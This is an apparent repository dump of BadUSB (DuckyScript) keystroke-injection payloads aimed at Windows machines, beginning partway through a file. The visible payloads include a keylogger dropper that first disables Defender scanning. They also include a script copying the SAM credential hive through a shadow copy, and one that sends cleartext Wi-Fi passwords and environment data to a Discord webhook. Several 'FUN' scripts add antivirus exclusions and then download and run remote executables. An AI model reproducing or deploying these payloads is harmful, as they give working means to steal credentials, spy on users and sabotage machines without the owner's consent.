6	+	GUI d
7	+	DELAY 500
8	+	GUI r
9	+	DELAY 500
10	+	STRING powershell.exe -windowstyle hidden
11	+	DELAY 200
12	+	CTRL SHIFT ENTER
13	+	DELAY 5000
14	+	LEFT
15	+	DELAY 150
16	+	ENTER
17	+	DELAY 5000
18	+	STRING cd C:\Users\Public\Documents
19	+	ENTER
20	+	STRING Add-MpPreference -ExclusionExtension ps1 -Force
21	+	ENTER
22	+	STRING Set-ExecutionPolicy unrestricted -Force
23	+	ENTER
24	+	STRING wget (LINK TO KEYLOGGER) -OutFile script.ps1
25	+	ENTER
26	+	DELAY 3500
27	+	STRING powershell.exe -noexit -windowstyle hidden -file script.ps1
28	+	ENTER
29	+	CAPSLOCK
30	+	DELAY 150
31	+	CAPSLOCK
32	+	DELAY 150
33	+	CAPSLOCK
34	+	DELAY 150
35	+	CAPSLOCK
36	+	DELAY 2000
37	+	CAPSLOCK
38	+	DELAY 150
39	+	CAPSLOCK
40	+	DELAY 150
41	+	CAPSLOCK
42	+	DELAY 150
43	+	CAPSLOCK
44	+	REM End of payload
45	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/ListWindowsUpdates.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Saves all installed windows updates to a list. Don't forget to change the path.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 1200
16	+	ALT y
17	+	DELAY 1200
18	+	GUI UP
19	+	DELAY 1200
20	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-90412137.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=center><h3> Installed Updates</h3>';$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME \| sort-object -property installedon -Descending \| ConvertTo-Html Description, HotFixId,Installedon,InstalledBy);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-90412137.html'
21	+	ENTER
22	+	STRING Compress-Archive -Path $fileSaveDir -DestinationPath results-90412137.zip ; exit
23	+	ENTER
24	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/SAMexfil.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Extracts Security Account Manager of the PC to a file.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 1500
8	+	WINDOWS r
9	+	DELAY 1500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 1200
16	+	ALT y
17	+	DELAY 1200
18	+	GUI UP
19	+	DELAY 1200
20	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-61748762.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>';$Report = $Report + (GET-WMIOBJECT Win32_Share \| convertto-html Name, Description, Path);$Report = $Report + '</div>';$Report >> $fileSaveDir'/ComputerInfo-61748762.html'
21	+	ENTER
22	+	STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-61748762.zip ; exit
23	+	DELAY 750
24	+	WINDOWS d
25	+	DELAY 1500
26	+	WINDOWS r
27	+	DELAY 1500
28	+	STRING powershell Start-Process powershell -Verb runAs
29	+	ENTER
30	+	DELAY 750
31	+	LEFTARROW
32	+	ENTER
33	+	DELAY 1200
34	+	ALT y
35	+	DELAY 1200
36	+	GUI UP
37	+	DELAY 1200
38	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-61748762.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$Report = $Report + '<div id=center><h3> Installed Programs</h3> ';$Report = $Report + (Get-WmiObject -class Win32_Product \| ConvertTo-html Name, Version,InstallDate);$Report = $Report + '</table></div>';$Report >> $fileSaveDir'/ComputerInfo-61748762.html'
39	+	ENTER
40	+	STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH\results-61748762.zip ; exit
41	+	ENTERLOCALE de
42	+	DELAY 750
43	+	WINDOWS d
44	+	DELAY 1500
45	+	WINDOWS r
46	+	DELAY 1500
47	+	STRING powershell Start-Process powershell -Verb runAs
48	+	ENTER
49	+	DELAY 750
50	+	LEFTARROW
51	+	ENTER
52	+	DELAY 1200
53	+	ALT y
54	+	DELAY 1200
55	+	GUI UP
56	+	DELAY 1200
57	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-61748762.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible');$shadow = gwmi Win32_ShadowCopy \| ? { $_.ID -eq $createShadow.ShadowID };$addSlash = $shadow.DeviceObject + '\';cmd /c mklink C:\shadowcopy $addSlash;Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir;Remove-Item -recurse -force 'C:\shadowcopy';$Report >> $fileSaveDir'/ComputerInfo-61748762.html';Compress-Archive -Path $fileSaveDir -DestinationPath PATHresults-61748762.zip ; exit
58	+	ENTER
59	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/SaveIP_ToDiscordWebhook.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Saves some general Information about the target pc to a file.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 200
8	+	STRING powershell
9	+	ENTER
10	+	DELAY 1000
11	+	STRING $url="DISCORD WEBHOOK LINK";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 \| Select-Object IPAddress,SuffixOrigin \| where IPAddress -notmatch '(127.0.0.1\|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) \| Select-String "\:(.+)$" \| %{$name=$_.Matches.Groups[1].Value.Trim(); $_} \| %{(netsh wlan show profile name="$name" key=clear)} \| Select-String "Key Content\W+\:(.+)$" \| %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} \| %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} \| Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body \| ConvertTo-Json);curl.exe -F "[email protected]" $url ; Remove-Item '.\stats.txt';exit
12	+	ENTER
13	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/USB_And_Harddrive_Information.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 900
8	+	WINDOWS r
9	+	DELAY 900
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 900
16	+	ALT y
17	+	DELAY 900
18	+	GUI UP
19	+	DELAY 900
20	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>';$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-68597243.html';$Report = $Report + '<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>';$u = 0;$allUsb = @(get-wmiobject win32_volume \| select Name, Label, FreeSpace);$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'
21	+	ENTER
22	+	STRING do {
23	+	ENTER
24	+	STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
25	+	ENTER
26	+	STRING $Report = $Report + '<tr><td>Drive Name: </td><td>' + $allUsb[$u].Name + $allUsb[$u].Label + '</td><td>Free Space: </td><td>' + $gbUSB + 'GB</td></tr>'
27	+	ENTER
28	+	STRING Write-Output $fullUSB
29	+	ENTER
30	+	STRING $u ++
31	+	ENTER
32	+	STRING } while ($u -lt $allUsb.Count)
33	+	ENTER
34	+	STRING $Report = $Report + '</table></div>'
35	+	ENTER
36	+	STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html'
37	+	ENTER
38	+	STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit
39	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Exfiltration/WIN_USER_INFO.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Saves some general Info about the current Win-User.
3	+	REM Version: 1.0
4	+	REM Category: Exfiltration
5	+	DELAY 750
6	+	WINDOWS d
7	+	DELAY 900
8	+	WINDOWS r
9	+	DELAY 900
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 750
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 900
16	+	ALT y
17	+	DELAY 900
18	+	STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>";$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-57059022.html';$Report = $Report + "<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>";$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 \| Where-Object {$_.Name -eq $env:UserName}\| Select AccountType,SID,PasswordRequired;$UserType = $UserInfo.AccountType;$UserSid = $UserInfo.SID;$UserPass = $UserInfo.PasswordRequired;$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator');$Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>";$Report = $Report + "</div>";$Report >> $fileSaveDir'/ComputerInfo-57059022.html'
19	+	ENTER
20	+	STRING Compress-Archive -Path $fileSaveDir -DestinationPath C:\PATH TO SAVE HERE\FILEresults-57059022.zip ; exit
21	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/Cartman.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Cartman. Yes.
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 600
8	+	STRING powershell -w h $k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $k;$i++){$o.SendKeys([char] 175)}; 1..10\|foreach {saps https://www.youtube.com/watch?v=U3sAkAWfxLY;sleep 1;$o.SendKeys('f')}
9	+	ENTER
10	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/ComputerTalks.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Makes the computer speak
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	STRING powershell.exe -nop -win hidden -c "Add-Type -AssemblyName System.speech; $synth = New-Object System.Speech.Synthesis.SpeechSynthesizer; $synth.Speak('Hello you behind the Screen, can't you see me ? I am inside your computer.')"
6	+	DELAY 100
7	+	ENTER
8	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/DeleteMicrosoftStore.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Deletes the Microsoft Store
3	+	REM Version: 1.0
4	+	REM Category: Fun
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 300
8	+	REM Start PowerShell as Admin
9	+	STRING powershell Start-Process powershell -Verb runAs
10	+	DELAY 300
11	+	ENTER
12	+	DELAY 500
13	+	LEFTARROW
14	+	DELAY 450
15	+	ENTER
16	+	DELAY 600
17	+	REM Deletes Microsoft Store
18	+	STRING Get-AppxPackage windowsstore\|Remove-AppxPackage
19	+	DELAY 200
20	+	ENTER
21	+
22	+
23	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/Destroy_Pc_with_tabs.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens a few Tabs...
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 1200
6	+	GUI r
7	+	DELAY 400
8	+	STRING cmd /Q /D /T:0a /F:OFF /V:OFF /K
9	+	DELAY 500
10	+	ENTER
11	+	DELAY 750
12	+	STRING DEL /Q MobileTabs.vbs
13	+	ENTER
14	+	STRING copy con MobileTabs.vbs
15	+	ENTER
16	+	STRING on error resume next
17	+	ENTER
18	+	STRING navOpenInBackgroundTab = &h1000
19	+	ENTER
20	+	STRING set oIE = CreateObject("InternetExplorer.Application")
21	+	ENTER
22	+	STRING Set args = WScript.Arguments
23	+	ENTER
24	+	STRING oIE.Navigate2 args.Item(0)
25	+	ENTER
26	+	STRING for intx = 1 to args.count
27	+	ENTER
28	+	STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
29	+	ENTER
30	+	STRING next
31	+	ENTER
32	+	STRING oIE.Visible = true
33	+	ENTER
34	+	CONTROL z
35	+	ENTER
36	+	STRING MobileTabs.vbs "http://www.google.com/" "http://mwomercs.com/" "http://hak5.org/" "http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"
37	+	ENTER
38	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/FakeBluescreen.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens a Website with an fake Bluescreen and setting it to fullscreen
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 400
8	+	STRING cmd
9	+	ENTER
10	+	DELAY 500
11	+	STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html
12	+	ENTER
13	+	DELAY 1000
14	+	F11
15	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/FakeUpdateWindows.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens a Website with an fake Update and setting it to fullscreen
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 400
8	+	STRING cmd
9	+	ENTER
10	+	DELAY 500
11	+	STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/
12	+	ENTER
13	+	DELAY 1000
14	+	F11
15	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/FakeVirus.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Opens a Website with an fake Virus and setting it to fullscreen
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 400
8	+	STRING cmd
9	+	ENTER
10	+	DELAY 500
11	+	STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/wnc/
12	+	ENTER
13	+	DELAY 1000
14	+	F11
15	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/Fck_Windows_Watermark/RemoveWinWatermark.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Removes Windows Watermark but doesn't activate Windows.
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 1200
6	+	GUI r
7	+	DELAY 100
8	+	STRING powershell Start-Process powershell -verb runAs
9	+	DELAY 600
10	+	ALT Y
11	+	DELAY 600
12	+	STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
13	+	ENTER
14	+	DELAY 100
15	+	STRING Restart-Computer -Force
16	+	ENTER
17	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/Fck_Windows_Watermark/placeholder

	1	+
	2	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/JustAmongUs.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: AmongUs takes over the PC!!!
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 500
8	+	STRING powershell Start-Process powershell -Verb runAs
9	+	CTRL-SHIFT ENTER
10	+	DELAY 1500
11	+	SHIFT TAB
12	+	DELAY 500
13	+	ENTER
14	+	DELAY 1500
15	+	STRING Add-MpPreference -ExclusionPath C:\Windows\system32
16	+	ENTER
17	+	DELAY 500
18	+	STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/badusb-payloads/releases/download/SUS-R1/sus.exe';$file='sus.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
19	+	ENTER
20	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/Matrix_Rain_CMD.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: There'll be the matrix rain in the cmd
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 1000
6	+	GUI r
7	+	DELAY 100
8	+	STRING notepad
9	+	ENTER
10	+	DELAY 100
11	+	STRING @echo off
12	+	ENTER
13	+	ENTER
14	+	DELAY 100
15	+	STRING color 02
16	+	ENTER
17	+	ENTER
18	+	DELAY 100
19	+	STRING mode 1000
20	+	ENTER
21	+	ENTER
22	+	DELAY 100
23	+	STRING :matrixbynima
24	+	ENTER
25	+	ENTER
26	+	DELAY 100
27	+	STRING echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
28	+	ENTER
29	+	ENTER
30	+	DELAY 100
31	+	STRING goto matrixbynima
32	+	ENTER
33	+	DELAY 100
34	+	CTRL S
35	+	DELAY 200
36	+	REM change %userprofile% to your user or the devices user that your using this on
37	+	STRING %userprofile%\Desktop\matrix.bat
38	+	ENTER
39	+	DELAY 1000
40	+	GUI r
41	+	DELAY 100
42	+	STRING cmd
43	+	ENTER
44	+	DELAY 100
45	+	STRING cd %userprofile%\Desktop\
46	+	ENTER
47	+	DELAY 50
48	+	STRING matrix.bat
49	+	ENTER
50	+	DELAY 1500
51	+	ENTER
52	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/NoMoreSound.txt

1	+	REM Author: UNC0V3R3D
2	+	REM Description: Mutes windows audio...
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 500
6	+	GUI r
7	+	DELAY 300
8	+	STRING powershell Start-Process powershell -Verb runAs
9	+	DELAY 200
10	+	ENTER
11	+	DELAY 600
12	+	LEFTARROW
13	+	DELAY 300
14	+	ENTER
15	+	DELAY 450
16	+	STRING (new-object -com wscript.shell).SendKeys([char]173)
17	+	DELAY 200
18	+	ENTER
19	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/NoMoreWifi.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: No more wifi until you turn it back on with ipconfig /renew
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 1000
6	+	GUI r
7	+	DELAY 100
8	+	STRING powershell -Nop -NonI -W Hidden -Exec Bypass "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; ipconfig /release"

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/RickRoll_IntoBSOD.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Rickroll video ends up in BSOD
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 400
6	+	GUI r
7	+	DELAY 500
8	+	STRING powershell Start-Process powershell -Verb runAs
9	+	CTRL-SHIFT ENTER
10	+	DELAY 850
11	+	SHIFT TAB
12	+	DELAY 500
13	+	ENTER
14	+	DELAY 1000
15	+	STRING Add-MpPreference -ExclusionPath C:\Windows\system32
16	+	ENTER
17	+	DELAY 500
18	+	STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/rickroll-bsod/releases/download/first-version/rick_dist.exe';$file='rick_dist.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
19	+	ENTER
20	+

■ ■ ■ ■ ■ ■

BadUsb-Collection/FUN/Rickroll.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Rickroll what else
3	+	REM Version: 1.0
4	+	REM Category: FUN
5	+	DELAY 1200
6	+	GUI r
7	+	DELAY 200
8	+	STRING cmd
9	+	ENTER
10	+	DELAY 200
11	+	STRING mkdir "%USERPROFILE%\Music\tmp"
12	+	ENTER
13	+	STRING cd %tmp% && copy con dlrick.vbs
14	+	ENTER
15	+	ENTER
16	+	STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
17	+	ENTER
18	+	STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
19	+	ENTER
20	+	ENTER
21	+	STRING Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
22	+	ENTER
23	+	STRING Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
24	+	ENTER
25	+	STRING xHttp.Open "GET", "https://qoret.com/dl/uploads/2019/07/Rick_Astley_-_Never_Gonna_Give_You_Up_Qoret.com.mp3", False
26	+	ENTER
27	+	STRING xHttp.Send
28	+	ENTER
29	+	STRING With bStrm
30	+	ENTER
31	+	STRING .type = 1
32	+	ENTER
33	+	STRING .open
34	+	ENTER
35	+	STRING .write xHttp.responseBody
36	+	ENTER
37	+	STRING .saveToFile PRFL + "\Music\tmp\rick.mp3", 2
38	+	ENTER
39	+	STRING End With
40	+	ENTER
41	+	DELAY 100
42	+	CTRL Z
43	+	ENTER
44	+	STRING copy con dlnir.vbs
45	+	ENTER
46	+	ENTER
47	+	STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
48	+	ENTER
49	+	STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
50	+	ENTER
51	+	ENTER
52	+	STRING Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
53	+	ENTER
54	+	STRING Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
55	+	ENTER
56	+	STRING xHttp.Open "GET", "http://www.nirsoft.net/utils/nircmd-x64.zip", False
57	+	ENTER
58	+	STRING xHttp.Send
59	+	ENTER
60	+	STRING With bStrm
61	+	ENTER
62	+	STRING .type = 1
63	+	ENTER
64	+	STRING .open
65	+	ENTER
66	+	STRING .write xHttp.responseBody
67	+	ENTER
68	+	STRING .saveToFile PRFL + "\Music\tmp\nircmd-x64.zip", 2
69	+	ENTER
70	+	STRING End With
71	+	ENTER
72	+	DELAY 100
73	+	CTRL Z
74	+	ENTER
75	+	STRING wscript dlnir.vbs && wscript dlrick.vbs
76	+	ENTER
77	+	DELAY 7000
78	+	STRING powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\Music\tmp\nircmd-x64.zip', '%USERPROFILE%\Music\tmp'); }"
79	+	ENTER
80	+	DELAY 750
81	+	STRING copy con volup.bat
82	+	ENTER
83	+	STRING :loop
84	+	ENTER
85	+	STRING %USERPROFILE%\Music\tmp\nircmd.exe mutesysvolume 0
86	+	ENTER
87	+	STRING %USERPROFILE%\Music\tmp\nircmd.exe setsysvolume 65535
88	+	ENTER
89	+	STRING timeout /t 5
90	+	ENTER
91	+	STRING goto loop
92	+	ENTER
93	+	DELAY 100
94	+	CTRL z
95	+	ENTER
96	+	STRING move volup.bat %USERPROFILE%\Music\tmp\volup.bat
97	+	ENTER
98	+	STRING copy con hidefiles.vbs
99	+	ENTER
100	+	STRING Dim oShell: Set oShell = CreateObject("WScript.Shell")
101	+	ENTER
102	+	STRING Dim PRFL: PRFL = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
103	+	ENTER
104	+	STRING Dim oFSo: Set oFSo = CreateObject("Scripting.FileSystemObject")
105	+	ENTER
